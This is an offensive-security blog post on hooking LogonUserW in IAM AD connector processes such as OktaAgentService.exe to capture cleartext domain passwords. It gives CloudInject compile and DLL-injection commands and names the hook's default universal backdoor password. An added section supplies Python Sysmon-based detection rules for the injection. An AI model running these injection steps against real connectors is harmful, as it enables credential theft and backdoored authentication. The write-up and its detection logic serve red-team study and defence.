Offensive SaaS Security - Exfiltrating Cleartext Credentials via LogonUserW Hooking

Recap

IAM providers such as Azure AD (Entra ID), Okta, and OneLogin are vulnerable to a red team attack technique known as LogonUserW hooking.

LogonUserW is an unmanaged Win32 API. Many IAM providers rely on it to implement delegated authentication flows, which let customers set up SSO in the cloud without having to upload all their domain credentials. Authentication is instead delegated to on-prem AD through the providers' agent connectors running inside the domain.

However, despite the dependency of many IAM providers on this API to implement delegated authentication, there is an unavoidable flaw: every credential passed to this API arrives in cleartext, a weakness originally found by @XPN.


Therefore, an attacker who can hook LogonUserW can directly capture users' cleartext credentials and even leave backdoors in the authentication flow.

You can observe this behavior in x64dbg by attaching to the connector's process and setting a breakpoint on LogonUserW in advapi32.dll.


Once the breakpoint is set, the cleartext credential is visible whenever a user login attempt happens.


Requirements

  • Compromise a machine running an AD connector. Vulnerable AD connectors include:
    • Entra ID Connector with Pass-Through Authentication mode
    • Okta AD Connector with Delegated Authentication mode
    • OneLogin AD Connector
  • Ensure the user you control on the compromised machine has SeDebugPrivilege, which local administrators typically hold.

Exploit

Overview

The risk arises from the use of the unmanaged Win32 API LogonUserW across various IAM providers, and the method of exploitation is the same regardless of the provider. Here, I will walk you through this attack using the Okta AD Connector as the example.

Tool

CloudInject: https://github.com/xpn/CloudInject

Steps for exploiting the Okta AD Connector:

  • Compile CloudInject, making sure to place the hooker DLL in a shared folder:

    x86_64-w64-mingw32-g++.exe .\Injector\injector.cpp -o .\Injector\injector.exe -static
    x86_64-w64-mingw32-g++.exe .\hooker\hooker.cpp -o C:\hooker.dll -static -shared

  • Locate the PID of OktaAgentService.exe:

    PS C:\Users\Administrator\Desktop\cloudinject\CloudInject-main> tasklist /FI "IMAGENAME eq OKTA*"

    Image Name                     PID Session Name        Session#    Mem Usage
    ========================= ======== ================ =========== ============
    OktaAgentService.exe          6560 Services                   0     56,860 K

  • Use injector.exe to inject hooker.dll into OktaAgentService.exe:

    .\Injector\injector.exe 6560 C:\hooker.dll


  • Under Okta's delegated authentication mode, every login request through Okta SSO is forwarded to on-prem AD. Once the hooker is successfully injected, it intercepts and captures the cleartext credentials of every login attempt.


  • Furthermore, the hooker leaves a universal password backdoor, which is OnePasswordToRuleThemAll! by default.


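The injection steps above leave telemetry that a defender can alert on. What follows is an added example, not code from the original post or from CloudInject: Python detection logic that runs over Sysmon-style events (Event ID 7 image load, 8 CreateRemoteThread, 10 ProcessAccess) and flags a module loaded into the connector process that is unsigned or sits outside the trusted install roots, a remote thread created in the connector by another process, or a handle to the connector opened with the access rights DLL injection needs. The sample events, the IAMConnector install directory and the trusted-root list are constructed assumptions; only OktaAgentService.exe, injector.exe and C:\hooker.dll come from the post.

```python
"""Detection rules for DLL injection into an IAM AD connector process.

Added example for this post (not part of CloudInject or any vendor product).
Event field names follow Sysmon Event IDs 7, 8 and 10; the sample events,
the connector's install directory and the trusted-root list are constructed.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Callable, Dict, List, Optional

# Connector service executables to protect. OktaAgentService.exe is the name
# used in the post; add the other connectors' service names for your estate.
CONNECTOR_IMAGES = {"oktaagentservice.exe"}

# Assumed trusted roots: a module loaded from anywhere else is suspicious.
TRUSTED_ROOTS = [
    PureWindowsPath(p.lower())
    for p in (r"C:\Windows\System32", r"C:\Windows\SysWOW64", r"C:\Windows\WinSxS",
              r"C:\Program Files", r"C:\Program Files (x86)")
]

# Access mask classic DLL injection needs on the target process:
# PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
INJECTION_ACCESS = 0x0002 | 0x0008 | 0x0020


@dataclass(frozen=True)
class Alert:
    rule: str
    target: str
    detail: str


def _is_connector(image: str) -> bool:
    return PureWindowsPath(image).name.lower() in CONNECTOR_IMAGES


def _under_trusted_root(path: str) -> bool:
    parts = PureWindowsPath(path.lower()).parts
    return any(parts[:len(r.parts)] == r.parts for r in TRUSTED_ROOTS)


def check_image_load(ev: dict) -> Optional[Alert]:
    """Event ID 7: a module was loaded into a process."""
    if not _is_connector(ev["Image"]):
        return None
    loaded = ev["ImageLoaded"]
    signed_ok = (ev.get("Signed", "false").lower() == "true"
                 and ev.get("SignatureStatus") == "Valid")
    reasons = []
    if not signed_ok:
        reasons.append("unsigned or invalid signature")
    if not _under_trusted_root(loaded):
        reasons.append("outside trusted install roots")
    if not reasons:
        return None
    return Alert("connector_module_load", ev["Image"], f"{loaded}: {', '.join(reasons)}")


def check_remote_thread(ev: dict) -> Optional[Alert]:
    """Event ID 8: a thread was created in another process."""
    if not _is_connector(ev["TargetImage"]):
        return None
    if ev["SourceImage"].lower() == ev["TargetImage"].lower():
        return None  # threads the connector creates in itself are normal
    return Alert("connector_remote_thread", ev["TargetImage"],
                 f"thread started by {ev['SourceImage']} at {ev.get('StartAddress')}")


def check_process_access(ev: dict) -> Optional[Alert]:
    """Event ID 10: a handle to the connector was opened by another process."""
    if not _is_connector(ev["TargetImage"]):
        return None
    granted = int(ev["GrantedAccess"], 16)
    if (granted & INJECTION_ACCESS) != INJECTION_ACCESS:
        return None
    return Alert("connector_process_access", ev["TargetImage"],
                 f"{ev['SourceImage']} opened handle with 0x{granted:X}")


RULES: Dict[int, Callable[[dict], Optional[Alert]]] = {
    7: check_image_load, 8: check_remote_thread, 10: check_process_access,
}


def scan(events: List[dict]) -> List[Alert]:
    """Run the applicable rule over each event and collect the alerts."""
    alerts = []
    for ev in events:
        rule = RULES.get(ev["EventID"])
        alert = rule(ev) if rule else None
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample events; the IAMConnector directory is a placeholder.
CONNECTOR = r"C:\Program Files (x86)\IAMConnector\OktaAgentService.exe"
INJECTOR = r"C:\Users\Administrator\Desktop\cloudinject\CloudInject-main\Injector\injector.exe"
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": CONNECTOR, "ImageLoaded": r"C:\Windows\System32\advapi32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},                        # normal load
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Temp\plugin.dll", "Signed": "false"},             # out of scope
    {"EventID": 7, "Image": CONNECTOR, "ImageLoaded": r"C:\hooker.dll",
     "Signed": "false"},                                                   # hooker injected
    {"EventID": 10, "SourceImage": INJECTOR, "TargetImage": CONNECTOR,
     "GrantedAccess": "0x1FFFFF"},                                         # handle for injection
    {"EventID": 8, "SourceImage": INJECTOR, "TargetImage": CONNECTOR,
     "StartAddress": "0x00007FFB1A2B3C4D"},                                # remote thread
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.target}: {a.detail}")
```

The three rules deliberately fire independently: a hooker loaded through a signed-binary side-loading path would still trip the untrusted-root rule, and an injector that opens the process with a tight access mask would still trip the remote-thread rule. In production the trusted roots should be narrowed to the connector's actual install directory, and the Event ID 10 rule needs an allow-list for legitimate handle openers such as EDR agents.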

Conclusion

The exploitation of the LogonUserW API across various IAM platforms, including Azure AD, Okta, and OneLogin, highlights a significant and universal vulnerability within these systems. By capitalizing on this flaw, attackers are able to capture cleartext credentials and implant backdoors, threatening the integrity and security of delegated authentication processes.